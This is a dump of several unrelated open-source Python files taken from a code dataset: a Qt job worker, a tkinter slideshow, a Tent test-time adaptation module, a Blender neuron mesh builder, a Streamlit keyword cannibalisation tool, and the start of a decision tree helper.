self._set_active(False)\n self.stopSuccess.emit()\n self._stopping = False\n # self._print_status(\"request_stop end\")\n\n def _request_all_existing_jobs_stop(self):\n self._to_do_queue.clear()\n for job_ in self._doing_queue:\n job_.stop_requested = True\n # endregion\n\n # region Job Processing\n def _job_loop(self):\n if not self._job_loop_active:\n self._job_loop_active = True\n while self._to_do_queue:\n current_job = self._to_do_queue.pop(0)\n self._do_job(current_job)\n self._job_loop_active = False\n\n if not self._doing_queue: # otherwise it will clean up here once the doing queue is empty\n self._final_cleanup()\n\n def _final_cleanup(self):\n # execution about to end, do clean-up\n self._set_active(False)\n # if the final job in the queue was requested to stop then that it was a stop request so emit stopSuccess\n if self._stopping:\n self.stopSuccess.emit()\n self._to_do_queue.clear()\n self._stopping = False\n # self._print_status(\"_final_cleanup\")\n\n def _do_job(self, job_: job.Job):\n # self._print_status(\"_do_job\")\n self._set_active(True)\n # add to (front) of doing queue\n self._doing_queue.insert(0, job_)\n job_.run()\n # if job is stopped early it will re-emerge here\n # let the thread event-queue run so this job can be requested to be stopped - thought to not be required\n # QtWidgets.QApplication.processEvents()\n # if the job was requested to be stopped then we don't want the actions associated with the job completing\n if not job_.stop_requested:\n self.jobComplete.emit(job_)\n # remove from doing queue\n self._doing_queue.remove(job_)\n\n def _set_active(self, active: bool):\n if active != self._worker_active:\n self._worker_active = active\n self.activeChange.emit(active)\n\n def _job_checkpoint(self, job_: job.Job, progress: float = 0.0):\n if job_.progress_estimator:\n self.progressUpdate.emit(job_, progress)\n # endregion\n","repo_name":"RobinLeeCarter/Mandel","sub_path":"thread/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":5607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71604438511","text":"# import required modules\nimport tkinter as tk\nfrom tkinter import *\nfrom PIL import Image\nfrom PIL import ImageTk\n \n \n \n# adjust window\nroot=tk.Tk()\nroot.geometry(\"500x500\")\n \n# loading the images\npicture1=ImageTk.PhotoImage(Image.open(\"p2.jpg\"))\npicture2=ImageTk.PhotoImage(Image.open(\"p3.jpg\"))\npicture3=ImageTk.PhotoImage(Image.open(\"p4.jpg\"))\n \nb=Label()\nb.pack()\n \n \n \n# using recursion to slide to next image\ni = 1\n \n# function to change to slide image\ndef move():\n global i\n if i == 4:\n i = 1\n if i == 1:\n b.config(image=picture1)\n elif i == 2:\n b.config(image=picture2)\n elif i == 3:\n b.config(image=picture3)\n i = i+1\n root.after(2000, move)\n \n# calling the function\nmove()\nroot.mainloop()","repo_name":"karanganwatuyisenge/MultimediaAss","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39227832515","text":"\"\"\"\r\nBuilds upon: https://github.com/DequanWang/tent\r\nCorresponding paper: https://arxiv.org/abs/2006.10726\r\n\"\"\"\r\n\r\nimport torch.nn as nn\r\nimport torch.jit\r\n\r\nfrom methods.base import TTAMethod\r\n\r\n\r\nclass Tent(TTAMethod):\r\n \"\"\"Tent adapts a model by entropy minimization during testing.\r\n\r\n Once tented, a model adapts itself by updating on every forward.\r\n \"\"\"\r\n @torch.enable_grad() # ensure grads in possible no grad context for testing\r\n def forward_and_adapt(self, x):\r\n \"\"\"Forward and adapt model on batch of data.\r\n Measure entropy of the model prediction, take gradients, and update params.\r\n \"\"\"\r\n self.optimizer.zero_grad()\r\n outputs = self.model(x)\r\n loss = softmax_entropy(outputs).mean()\r\n loss.backward()\r\n self.optimizer.step()\r\n return outputs\r\n\r\n @staticmethod\r\n def collect_params(model):\r\n \"\"\"Collect the affine scale + shift parameters from batch norms.\r\n\r\n Walk the model's modules and collect all batch normalization parameters.\r\n Return the parameters and their names.\r\n\r\n Note: other choices of parameterization are possible!\r\n \"\"\"\r\n params = []\r\n names = []\r\n for nm, m in model.named_modules():\r\n if isinstance(m, nn.BatchNorm2d):\r\n for np, p in m.named_parameters():\r\n if np in ['weight', 'bias']: # weight is scale, bias is shift\r\n params.append(p)\r\n names.append(f\"{nm}.{np}\")\r\n return params, names\r\n\r\n @staticmethod\r\n def configure_model(model):\r\n \"\"\"Configure model for use with tent.\"\"\"\r\n # train mode, because tent optimizes the model to minimize entropy\r\n model.train()\r\n # disable grad, to (re-)enable only what tent updates\r\n model.requires_grad_(False)\r\n # configure norm for tent updates: enable grad + force batch statisics\r\n for m in model.modules():\r\n if isinstance(m, nn.BatchNorm2d):\r\n m.requires_grad_(True)\r\n # force use of batch stats in train and eval modes\r\n m.track_running_stats = False\r\n m.running_mean = None\r\n m.running_var = None\r\n return model\r\n\r\n @staticmethod\r\n def check_model(model):\r\n \"\"\"Check model for compatability with tent.\"\"\"\r\n is_training = model.training\r\n assert is_training, \"tent needs train mode: call model.train()\"\r\n param_grads = [p.requires_grad for p in model.parameters()]\r\n has_any_params = any(param_grads)\r\n has_all_params = all(param_grads)\r\n assert has_any_params, \"tent needs params to update: \" \\\r\n \"check which require grad\"\r\n assert not has_all_params, \"tent should not update all params: \" \\\r\n \"check which require grad\"\r\n has_bn = any([isinstance(m, nn.BatchNorm2d) for m in model.modules()])\r\n assert has_bn, \"tent needs normalization for its optimization\"\r\n\r\n\r\n@torch.jit.script\r\ndef softmax_entropy(x: torch.Tensor) -> torch.Tensor:\r\n \"\"\"Entropy of softmax distribution from logits.\"\"\"\r\n return -(x.softmax(1) * x.log_softmax(1)).sum(1)\r\n","repo_name":"mariodoebler/test-time-adaptation","sub_path":"segmentation/methods/tent.py","file_name":"tent.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"38"} +{"seq_id":"31886731055","text":"import copy\n\n# Blender imports\nimport bpy, mathutils\n\n# Internal modules\nimport neuromorphovis as nmv\nimport neuromorphovis.builders\nimport neuromorphovis.enums\nimport neuromorphovis.mesh\nimport neuromorphovis.shading\nimport neuromorphovis.skeleton\nimport neuromorphovis.utilities\nimport neuromorphovis.scene\n\n\n####################################################################################################\n# @MetaBuilder\n####################################################################################################\nclass MetaBuilder:\n \"\"\"Mesh builder that creates high quality meshes with nice bifurcations based on meta objects\"\"\"\n\n ################################################################################################\n # @__init__\n ################################################################################################\n def __init__(self,\n morphology,\n options):\n \"\"\"Constructor\n\n :param morphology:\n A given morphology skeleton to create the mesh for.\n :param options:\n Loaded options from NeuroMorphoVis.\n \"\"\"\n\n # Morphology\n self.morphology = morphology\n\n # Loaded options from NeuroMorphoVis\n self.options = options\n\n # A list of the colors/materials of the soma\n self.soma_materials = None\n\n # A list of the colors/materials of the axon\n self.axon_materials = None\n\n # A list of the colors/materials of the basal dendrites\n self.basal_dendrites_materials = None\n\n # A list of the colors/materials of the apical dendrite\n self.apical_dendrite_materials = None\n\n # A list of the colors/materials of the spines\n self.spines_colors = None\n\n # A reference to the reconstructed soma mesh\n self.reconstructed_soma_mesh = None\n\n # A reference to the reconstructed spines mesh\n self.spines_mesh = None\n\n # A parameter to track the current branching order on each arbor\n # NOTE: This parameter must get reset when you start working on a new arbor\n self.branching_order = 0\n\n # A list of all the meshes that are reconstructed on a piecewise basis and correspond to\n # the different components of the neuron including soma, arbors and the spines as well\n self.reconstructed_neuron_meshes = list()\n\n # Meta object skeleton, used to build the skeleton of the morphology\n self.meta_skeleton = None\n\n # Meta object mesh, used to build the mesh of the morphology\n self.meta_mesh = None\n\n # A scale factor that was figured out by trial and error to correct the scaling of the radii\n self.magic_scale_factor = 1.575\n\n ################################################################################################\n # @create_materials\n ################################################################################################\n def create_materials(self,\n name,\n color):\n \"\"\"Creates just two materials of the mesh on the input parameters of the user.\n\n :param name:\n The name of the material/color.\n :param color:\n The code of the given colors.\n :return:\n A list of two elements (different or same colors) where we can apply later to the drawn\n sections or segments.\n \"\"\"\n\n # A list of the created materials\n materials_list = []\n\n for i in range(2):\n\n # Create the material\n material = nmv.shading.create_material(\n name='%s_color_%d' % (name, i), color=color,\n material_type=self.options.mesh.material)\n\n # Append the material to the materials list\n materials_list.append(material)\n\n # Return the list\n return materials_list\n\n ################################################################################################\n # @create_skeleton_materials\n ################################################################################################\n def create_skeleton_materials(self):\n \"\"\"Create the materials of the skeleton.\n \"\"\"\n\n for material in bpy.data.materials:\n if 'soma_skeleton' in material.name or \\\n 'axon_skeleton' in material.name or \\\n 'basal_dendrites_skeleton' in material.name or \\\n 'apical_dendrite_skeleton' in material.name or \\\n 'spines' in material.name:\n material.user_clear()\n bpy.data.materials.remove(material)\n\n # Soma\n self.soma_materials = self.create_materials(\n name='soma_skeleton', color=self.options.mesh.soma_color)\n\n # Axon\n self.axon_materials = self.create_materials(\n name='axon_skeleton', color=self.options.mesh.axon_color)\n\n # Basal dendrites\n self.basal_dendrites_materials = self.create_materials(\n name='basal_dendrites_skeleton', color=self.options.mesh.basal_dendrites_color)\n\n # Apical dendrite\n self.apical_dendrite_materials = self.create_materials(\n name='apical_dendrite_skeleton', color=self.options.mesh.apical_dendrites_color)\n\n # Spines\n self.spines_colors = self.create_materials(\n name='spines', color=self.options.mesh.spines_color)\n\n # Create an illumination specific for the given material\n nmv.shading.create_material_specific_illumination(self.options.morphology.material)\n\n ################################################################################################\n # @verify_and_repair_morphology\n ################################################################################################\n def verify_and_repair_morphology(self):\n \"\"\"Verifies and repairs the morphology if the contain any artifacts that would potentially\n affect the reconstruction quality of the mesh.\n \"\"\"\n\n # Remove the internal samples, or the samples that intersect the soma at the first\n # section and each arbor\n nmv.skeleton.ops.apply_operation_to_morphology(\n *[self.morphology, nmv.skeleton.ops.remove_samples_inside_soma])\n\n # The arbors can be selected to be reconstructed with sharp edges or smooth ones. For the\n # sharp edges, we do NOT need to re-sample the morphology skeleton. However, if the smooth\n # edges option is selected, the arbors must be re-sampled to avoid any meshing artifacts\n # after applying the vertex smoothing filter. The re-sampling filter for the moment\n # re-samples the morphology sections at 2.5 microns, however this can be improved later\n # by adding an algorithm that re-samples the section based on its radii.\n if self.options.mesh.edges == nmv.enums.Meshing.Edges.SMOOTH:\n\n # Apply the re-sampling filter on the whole morphology skeleton\n nmv.skeleton.ops.apply_operation_to_morphology(\n *[self.morphology, nmv.skeleton.ops.resample_sections])\n\n # Verify the connectivity of the arbors to the soma to filter the disconnected arbors,\n # for example, an axon that is emanating from a dendrite or two intersecting dendrites\n nmv.skeleton.ops.update_arbors_connection_to_soma(self.morphology)\n\n # Primary and secondary branching\n if self.options.mesh.branching == nmv.enums.Meshing.Branching.ANGLES:\n\n # Label the primary and secondary sections based on angles\n nmv.skeleton.ops.apply_operation_to_morphology(\n *[self.morphology,\n nmv.skeleton.ops.label_primary_and_secondary_sections_based_on_angles])\n\n else:\n\n # Label the primary and secondary sections based on radii\n nmv.skeleton.ops.apply_operation_to_morphology(\n *[self.morphology,\n nmv.skeleton.ops.label_primary_and_secondary_sections_based_on_radii])\n\n ################################################################################################\n # @create_meta_segment\n ################################################################################################\n def create_meta_segment(self,\n p1,\n p2,\n r1,\n r2):\n \"\"\"Constructs a segment that is composed of two points with a meta object.\n\n :param p1:\n First point coordinate.\n :param p2:\n Second point coordinate.\n :param r1:\n First point radius.\n :param r2:\n Second point radius.\n \"\"\"\n\n # Segment vector\n segment = p2 - p1\n segment_length = segment.length\n\n # Make sure that the segment length is not zero\n # TODO: Verify this when the radii are greater than the distance\n if segment_length < 0.001:\n return\n\n # Verify the radii, or fix them\n if r1 < 0.001 * segment_length:\n r1 = 0.001 * segment_length\n if r2 < 0.001 * segment_length:\n r2 = 0.001 * segment_length\n\n # Compute the deltas between the first and last points along the segments\n dr = r2 - r1\n dx = p2[0] - p1[0]\n dy = p2[1] - p1[1]\n dz = p2[2] - p1[2]\n\n # Keep track on the distance traveled along the segment while building, initially 0\n travelled_distance = 0.0\n\n # Local points, initially at the first point\n r = r1\n x = p1[0]\n y = p1[1]\n z = p1[2]\n\n # Construct the meta elements along the segment\n while travelled_distance < segment_length:\n\n # Make a meta ball (or sphere) at this point\n meta_element = self.meta_skeleton.elements.new()\n\n # Set its radius\n # TODO: Find a solution to compensate the connection points\n meta_element.radius = r\n\n # Update its coordinates\n meta_element.co = (x, y, z)\n\n # Proceed to the second point\n travelled_distance += r / 2\n\n r = r1 + (travelled_distance * dr / segment_length)\n\n # Get the next point\n x = p1[0] + (travelled_distance * dx / segment_length)\n y = p1[1] + (travelled_distance * dy / segment_length)\n z = p1[2] + (travelled_distance * dz / segment_length)\n\n ################################################################################################\n # @create_meta_section\n ################################################################################################\n def create_meta_section(self,\n section):\n \"\"\"Create a section with meta objects.\n\n :param section:\n A given section to extrude a mesh around it.\n \"\"\"\n\n # Get the list of samples\n samples = section.samples\n\n # Ensure that the section has at least two samples, otherwise it will give an error\n if len(samples) < 2:\n return\n\n # Proceed segment by segment\n for i in range(len(samples) - 1):\n self.meta_skeleton.resolution = samples[i].radius * 0.5\n\n # Create the meta segment\n self.create_meta_segment(\n p1=samples[i].point,\n p2=samples[i + 1].point,\n r1=samples[i].radius * self.magic_scale_factor,\n r2=samples[i + 1].radius * self.magic_scale_factor)\n\n ################################################################################################\n # @create_meta_arbor\n ################################################################################################\n def create_meta_arbor(self,\n root,\n max_branching_order):\n \"\"\"Extrude the given arbor section by section recursively using meta objects.\n\n :param root:\n The root of a given section.\n :param max_branching_order:\n The maximum branching order set by the user to terminate the recursive call.\n \"\"\"\n\n # Do not proceed if the branching order limit is hit\n if root.branching_order > max_branching_order:\n return\n\n # Create the section\n self.create_meta_section(root)\n\n # Create the children sections recursively\n for child in root.children:\n self.create_meta_arbor(child, max_branching_order)\n\n ################################################################################################\n # @build_arbors\n ################################################################################################\n def build_arbors(self):\n \"\"\"Builds the arbors of the neuron as tubes and AT THE END converts them into meshes.\n If you convert them during the building, the scene is getting crowded and the process is\n getting exponentially slower.\n\n :return:\n A list of all the individual meshes of the arbors.\n \"\"\"\n\n # Header\n nmv.logger.header('Building Arbors')\n\n # Apply the morphology reformation filters if requested before creating the arbors\n\n # Taper the sections if requested\n if self.options.mesh.skeletonization == nmv.enums.Meshing.Skeleton.TAPERED or \\\n self.options.mesh.skeletonization == nmv.enums.Meshing.Skeleton.TAPERED_ZIGZAG:\n nmv.skeleton.ops.apply_operation_to_morphology(\n *[self.morphology, nmv.skeleton.ops.taper_section])\n\n # Zigzag the sections if required\n if self.options.mesh.skeletonization == nmv.enums.Meshing.Skeleton.ZIGZAG or \\\n self.options.mesh.skeletonization == nmv.enums.Meshing.Skeleton.TAPERED_ZIGZAG:\n nmv.skeleton.ops.apply_operation_to_morphology(\n *[self.morphology, nmv.skeleton.ops.zigzag_section])\n\n # Draw the apical dendrite, if exists\n if not self.options.morphology.ignore_apical_dendrite:\n nmv.logger.info('Apical dendrite')\n\n # Create the apical dendrite mesh\n if self.morphology.apical_dendrite is not None:\n\n self.create_meta_arbor(\n root=self.morphology.apical_dendrite,\n max_branching_order=self.options.morphology.apical_dendrite_branch_order)\n\n # Draw the basal dendrites\n if not self.options.morphology.ignore_basal_dendrites:\n\n # Do it dendrite by dendrite\n for i, basal_dendrite in enumerate(self.morphology.dendrites):\n\n # Create the basal dendrite meshes\n nmv.logger.info('Dendrite [%d]' % i)\n self.create_meta_arbor(\n root=basal_dendrite,\n max_branching_order=self.options.morphology.basal_dendrites_branch_order)\n\n # Draw the axon as a set connected sections\n if not self.options.morphology.ignore_axon:\n nmv.logger.info('Axon')\n\n # Create the apical dendrite mesh\n if self.morphology.axon is not None:\n\n # Create the axon mesh\n self.create_meta_arbor(\n root=self.morphology.axon,\n max_branching_order=self.options.morphology.axon_branch_order)\n\n ################################################################################################\n # @decimate_neuron_mesh\n ################################################################################################\n def decimate_neuron_mesh(self):\n \"\"\"Decimate the reconstructed neuron mesh.\n \"\"\"\n\n nmv.logger.header('Decimating the mesh')\n\n if 0.05 < self.options.mesh.tessellation_level < 1.0:\n nmv.logger.info('Decimating the neuron')\n\n # Get a list of all the mesh objects (except the spines) of the neuron\n neuron_meshes = list()\n for scene_object in bpy.context.scene.objects:\n\n # Only for meshes\n if scene_object.type == 'MESH':\n\n # Exclude the spines\n if 'spine' in scene_object.name:\n continue\n\n # Otherwise, add the object to the list\n else:\n neuron_meshes.append(scene_object)\n\n # Do it mesh by mesh\n for i, object_mesh in enumerate(neuron_meshes):\n\n # Update the texture space of the created meshes\n object_mesh.select = True\n bpy.context.object.data.use_auto_texspace = False\n bpy.context.object.data.texspace_size[0] = 5\n bpy.context.object.data.texspace_size[1] = 5\n bpy.context.object.data.texspace_size[2] = 5\n\n # Skip the soma, if the soma is disconnected\n if 'soma' in object_mesh.name:\n continue\n\n # Show the progress\n nmv.utilities.show_progress(\n '\\t * Decimating the mesh', float(i),float(len(neuron_meshes)))\n\n # Decimate each mesh object\n nmv.mesh.ops.decimate_mesh_object(\n mesh_object=object_mesh, decimation_ratio=self.options.mesh.tessellation_level)\n\n ################################################################################################\n # @reconstruct_soma_mesh\n ################################################################################################\n def reconstruct_soma_mesh(self):\n \"\"\"Reconstruct the mesh of the soma.\n\n NOTE: To improve the performance of the soft body physics simulation, reconstruct the\n soma profile before the arbors, such that the scene is almost empty.\n\n NOTE: If the soma is requested to be connected to the initial segments of the arbors,\n we must use a high number of subdivisions to make smooth connections that look nice,\n but if the arbors are connected to the soma origin, then we can use less subdivisions\n since the soma will not be connected to the arbor at all.\n \"\"\"\n\n # If the soma is connected to the root arbors\n if self.options.mesh.soma_connection == nmv.enums.Meshing.SomaConnection.CONNECTED:\n soma_builder_object = nmv.builders.SomaBuilder(\n morphology=self.morphology, options=self.options)\n\n # Otherwise, ignore\n else:\n soma_builder_object = nmv.builders.SomaBuilder(\n morphology=self.morphology,\n options=self.options)\n\n # Reconstruct the soma mesh\n self.reconstructed_soma_mesh = soma_builder_object.reconstruct_soma_mesh(apply_shader=False)\n\n # Apply the shader to the reconstructed soma mesh\n nmv.shading.set_material_to_object(self.reconstructed_soma_mesh, self.soma_materials[0])\n\n def add_spines(self):\n\n # Add spines\n spines_objects = None\n if self.options.mesh.spines == nmv.enums.Meshing.Spines.Source.CIRCUIT:\n nmv.logger.header('Adding circuit spines')\n spines_objects = nmv.builders.build_circuit_spines(\n morphology=self.morphology, blue_config=self.options.morphology.blue_config,\n gid=self.options.morphology.gid, material=self.spines_colors[0])\n\n # Random spines\n elif self.options.mesh.spines == nmv.enums.Meshing.Spines.Source.RANDOM:\n nmv.logger.header('Adding random spines')\n spines_builder = nmv.builders.RandomSpineBuilder(\n morphology=self.morphology, options=self.options)\n spines_objects = spines_builder.add_spines_to_morphology()\n\n # Otherwise ignore spines\n else:\n return\n\n # Join the spine objects into a single mesh\n spine_mesh_name = '%s_spines' % self.options.morphology.label\n self.spines_mesh = nmv.mesh.join_mesh_objects(spines_objects, spine_mesh_name)\n\n ################################################################################################\n # @initialize_meta_object\n ################################################################################################\n def initialize_meta_object(self,\n name):\n \"\"\"Constructs and initialize a new meta object that will be the basis of the mesh.\n\n :param name:\n Meta-object name.\n :return:\n A reference to the meta object\n \"\"\"\n\n # Create a new meta skeleton that will be used to reconstruct the skeleton frame\n self.meta_skeleton = bpy.data.metaballs.new(name)\n\n # Create a new meta object that reflects the reconstructed mesh at the end of the operation\n self.meta_mesh = bpy.data.objects.new(name, self.meta_skeleton)\n\n # Get a reference to the scene\n scene = bpy.context.scene\n\n # Link the meta object to the scene\n scene.objects.link(self.meta_mesh)\n\n # Update the resolution of the meta skeleton\n # TODO: Get these parameters from the user interface\n self.meta_skeleton.resolution = 1.0\n\n ################################################################################################\n # @emanate_soma_towards_arbor\n ################################################################################################\n def emanate_soma_towards_arbor(self,\n arbor):\n \"\"\"Extends the space of the soma towards the given arbor to make a shape that is not sphere.\n\n :param arbor:\n A given arbor to emanate the soma towards.\n \"\"\"\n\n # Assume that from the soma center towards the first point along the arbor is a segment\n self.create_meta_segment(\n p1=self.morphology.soma.centroid,\n p2=arbor.samples[0].point,\n r1=self.morphology.soma.mean_radius,\n r2=arbor.samples[0].radius * self.magic_scale_factor)\n\n ################################################################################################\n # @build_soma_from_meta_objects\n ################################################################################################\n def build_soma_from_meta_objects(self):\n\n # Header\n nmv.logger.header('Building Soma from Meta Objects')\n\n # Emanate towards the apical dendrite, if exists\n if not self.options.morphology.ignore_apical_dendrite:\n nmv.logger.info('Apical dendrite')\n\n # The apical dendrite must be valid\n if self.morphology.apical_dendrite is not None:\n self.emanate_soma_towards_arbor(arbor=self.morphology.apical_dendrite)\n\n # Emanate towards basal dendrites\n if not self.options.morphology.ignore_basal_dendrites:\n\n # Do it dendrite by dendrite\n for i, basal_dendrite in enumerate(self.morphology.dendrites):\n\n # Basal dendrites\n nmv.logger.info('Dendrite [%d]' % i)\n self.emanate_soma_towards_arbor(arbor=basal_dendrite)\n\n # Emanate towards the axon, if exists\n if not self.options.morphology.ignore_apical_dendrite:\n nmv.logger.info('Axon')\n\n # The axon must be valid\n if self.morphology.axon is not None:\n self.emanate_soma_towards_arbor(arbor=self.morphology.axon)\n\n ################################################################################################\n # @finalize_meta_object\n ################################################################################################\n def finalize_meta_object(self):\n \"\"\"Converts the meta object to a mesh and get it ready for export or visualization.\n\n :return:\n \"\"\"\n\n # Header\n nmv.logger.header('Meshing the Meta Object')\n\n # Deselect all objects\n nmv.scene.ops.deselect_all()\n\n # Select the mesh\n self.meta_mesh = bpy.context.scene.objects[self.morphology.label]\n self.meta_mesh.select = True\n bpy.context.scene.objects.active = self.meta_mesh\n\n # Convert it to a mesh from meta-balls\n bpy.ops.object.convert(target='MESH')\n\n self.meta_mesh = bpy.context.scene.objects[self.morphology.label + '.001']\n self.meta_mesh.name = self.morphology.label\n\n # Re-select it again to be able to perform post-processing operations in it\n self.meta_mesh.select = True\n\n bpy.context.scene.objects.active = self.meta_mesh\n\n ################################################################################################\n # @assign_material_to_mesh\n ################################################################################################\n def assign_material_to_mesh(self):\n\n # Deselect all objects\n nmv.scene.ops.deselect_all()\n\n # Activate the mesh object\n bpy.context.scene.objects.active = self.meta_mesh\n\n # Adjusting the texture space, before assigning the material\n bpy.context.object.data.use_auto_texspace = False\n bpy.context.object.data.texspace_size[0] = 5\n bpy.context.object.data.texspace_size[1] = 5\n bpy.context.object.data.texspace_size[2] = 5\n\n # Assign the material to the selected mesh\n nmv.shading.set_material_to_object(self.meta_mesh, self.soma_materials[0])\n\n # Activate the mesh object\n self.meta_mesh.select = True\n bpy.context.scene.objects.active = self.meta_mesh\n\n ################################################################################################\n # @transform_to_global_coordinates\n ################################################################################################\n def transform_to_global_coordinates(self):\n \"\"\"Transform the neuron membrane to the global coordinates.\n\n NOTE: Spine transformation is already implemented by the spine builder, and therefore\n this function applies only to the arbors and the soma.\n \"\"\"\n\n # Transform the neuron object to the global coordinates\n nmv.logger.header('Transforming to global coordinates')\n nmv.skeleton.ops.transform_to_global_coordinates(\n mesh_object=self.meta_mesh, blue_config=self.options.morphology.blue_config,\n gid=self.options.morphology.gid)\n\n ################################################################################################\n # @reconstruct_mesh\n ################################################################################################\n def reconstruct_mesh(self):\n \"\"\"Reconstructs the neuronal mesh using meta objects.\n \"\"\"\n\n # Verify and repair the morphology\n # self.verify_and_repair_morphology()\n\n # Initialize the meta object\n self.initialize_meta_object(name=self.options.morphology.label)\n\n # Build the soma\n self.build_soma_from_meta_objects()\n\n # Build the arbors\n self.build_arbors()\n\n # Finalize the meta object and construct a solid object\n # self.finalize_meta_object()\n\n # We can here create the materials at the end to avoid any issues\n self.create_skeleton_materials()\n\n # Assign the material to the mesh\n self.assign_material_to_mesh()\n\n # Transform the mesh to the global coordinates\n if self.options.mesh.global_coordinates:\n self.transform_to_global_coordinates()\n\n # Mission done\n nmv.logger.header('Done!')\n\n # Return a reference to the created mesh\n return self.meta_mesh\n\n\n\n # Adding surface roughness\n # self.add_surface_noise()\n\n # Decimation\n self.decimate_neuron_mesh()\n\n\n #\n # Compile a list of all the meshes in the scene, they account for the different mesh\n # objects of the neuron\n for scene_object in bpy.context.scene.objects:\n if scene_object.type == 'MESH':\n\n # Add the object to the list\n self.reconstructed_neuron_meshes.append(scene_object)\n\n # If the meshes are merged into a single object, we must override the texture values\n # Update the texture space of the created mesh\n scene_object.select = True\n bpy.context.scene.objects.active = scene_object\n bpy.context.object.data.use_auto_texspace = False\n bpy.context.object.data.texspace_size[0] = 5\n bpy.context.object.data.texspace_size[1] = 5\n bpy.context.object.data.texspace_size[2] = 5\n scene_object.select = False\n\n # Connecting all the mesh objects together in a single object\n if self.options.mesh.neuron_objects_connection == \\\n nmv.enums.Meshing.ObjectsConnection.CONNECTED:\n\n nmv.logger.header('Connecting neurons objects')\n nmv.logger.info('Connecting neuron: [%s_mesh]' % self.options.morphology.label)\n\n # Group all the objects into a single mesh object after the decimation\n neuron_mesh = nmv.mesh.ops.join_mesh_objects(\n mesh_list=self.reconstructed_neuron_meshes,\n name='%s_mesh' % self.options.morphology.label)\n\n # Update the reconstructed_neuron_meshes list to a single object\n self.reconstructed_neuron_meshes = [neuron_mesh]\n\n # Transform the neuron object to the global coordinates\n if self.options.mesh.global_coordinates:\n nmv.logger.header('Transforming to global coordinates')\n\n for mesh_object in self.reconstructed_neuron_meshes:\n nmv.skeleton. ops.transform_to_global(\n neuron_object=mesh_object,\n blue_config=self.options.morphology.blue_config,\n gid=self.options.morphology.gid)\n\n\n\n return self.reconstructed_neuron_meshes","repo_name":"lkoelman/dbs-neuromorphovis","sub_path":"neuromorphovis/builders/mesh/meta_builder.py","file_name":"meta_builder.py","file_ext":"py","file_size_in_byte":30074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23051797275","text":"import pandas as pd\nimport streamlit as st\n\n#create page configurations to provide a Meta Title and main header\nst.set_page_config(page_title=\"Cannibalisation Data Review\", initial_sidebar_state=\"auto\")\nst.title('Cannibalisation Tool')\n\n# read the csv file and create the dataframe\n# update df = pd.read_csv('your_file.csv') to:\nuploaded_file = st.file_uploader(\"Use a GSC API export that includes query and page as the dimensions, exporting clicks, impressions, avg. position and CTR\", type='csv')\n\n#update to include slider so you can customise your cannibalisation threshold\nimpression_th = st.slider(\"Input what impression share threshold is required to be marked as potential cannibalisation\", min_value=0.0, max_value=1.0, value=0.1) \nclick_th = st.slider(\"Input what click share threshold is required to be marked as potential cannibalisation\", min_value=0.0, max_value=1.0, value=0.1)\n\n#update to add \"uploaded_file\"\nif uploaded_file is not None:\n\n @st.cache\n def create_df(file):\n\n df = pd.read_csv(uploaded_file)\n # group the data by the query column and calculate the total impressions and total clicks for each query\n df_impressions = df.groupby('query')['impressions'].transform('sum')\n df_clicks = df.groupby('query')['clicks'].transform('sum')\n\n # create new columns in the original dataframe with the total impressions and total clicks for each query\n df['total_impressions'] = df_impressions\n df['total_clicks'] = df_clicks\n\n # create a new column that calculates the impressions share for each page for each query\n df['impressions_share'] = df['impressions'] / df['total_impressions'].fillna(0)\n\n # create a new column that calculates the clicks share for each page for each query\n df['clicks_share'] = df['clicks'] / df['total_clicks'].fillna(0)\n\n #had to rerun this again to get the right approach\n df['more_than_one_page_over_impr_cann_threshold'] = df.groupby('query')['impressions_share'].transform(lambda x: (x >= impression_th).sum() > 1)\n\n # create a new column that shows if there are more than one pages with 10% or more clicks share\n df['more_than_one_page_over_clicks_cann_threshold'] = df.groupby('query')['clicks_share'].transform(lambda x: (x >= click_th).sum() > 1)\n\n filtered_df = df[(df['more_than_one_page_over_impr_cann_threshold'] == True) | (df['more_than_one_page_over_clicks_cann_threshold'] == True)]\n return filtered_df\n \n df = create_df(uploaded_file)\n #create your filters\n\n st.write(\"If you'd rather just export the data in full and use another tool to find what you need, you can export the full data table below, otherwise scroll further to filter your dataset.\")\n csv_1 = df.to_csv(index=False)\n st.download_button('Download Full Data as CSV', csv_1, file_name = 'Full data - unfiltered.csv', mime='text/csv')\n\n st.header(\"Output table\")\n st.write(\"The table below is filtered to only queries with 2 or more pages with over 10% of either clicks or impressions. Now we have the output, we can start adding filters so we get exactly what we want\")\n\n col1,col2 = st.columns(2)\n\n with col1:\n filter_tot_imp = st.select_slider('Filter by total query impressions', options=[0,1,10,50,100,200,300,400,500,1000,10000], value=0)\n with col2:\n filter_tot_cli = st.select_slider('Filter by total query clicks', options=[0,1,10,50,100,200,300,400,500,1000,10000], value=0)\n \n col3,col4 = st.columns(2)\n\n with col3:\n filter_imp_share = st.slider('Find out the biggest problems by filtering by impression share', min_value=0.0, max_value=1.0, value=0.0)\n with col4:\n filter_imp_click = st.slider('Find out the biggest problems by filtering by click share', min_value=0.0, max_value=1.0, value=0.0)\n\n # print the new dataframe\n\n filtered_df = df[(df['total_impressions'] >= filter_tot_imp) & (df['total_clicks'] >= filter_tot_cli) & (df['impressions_share'] >= filter_imp_share) & (df['clicks_share'] >= filter_imp_click)]\n st.write(\"There are \", len(filtered_df.index), \" rows in this current filtered dataframe and \", filtered_df['query'].unique().size, \" unique queries.\")\n st.dataframe(filtered_df)\n csv = filtered_df.to_csv(index = False)\n st.download_button('Download Table as CSV', csv, file_name = 'output.csv', mime='text/csv')\n","repo_name":"pluswillseo/cannibalisation_review","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"3133151429","text":"from sklearn import tree\nfrom sklearn.tree import DecisionTreeClassifier\nclass DecisionTree(object):\n def getDtree(self, features, y=None):\n if y is None:\n y=self.target\n df = self.df\n X = df[features]\n dtree = DecisionTreeClassifier()\n dtree = dtree.fit(X, df[y])\n return dtree\n def createDecisionTreeData(self, features, y):\n dtree = self.getDtree(features, y)\n self.graphData = tree.export_graphviz(\n dtree, out_file=None, feature_names=features\n )\n return 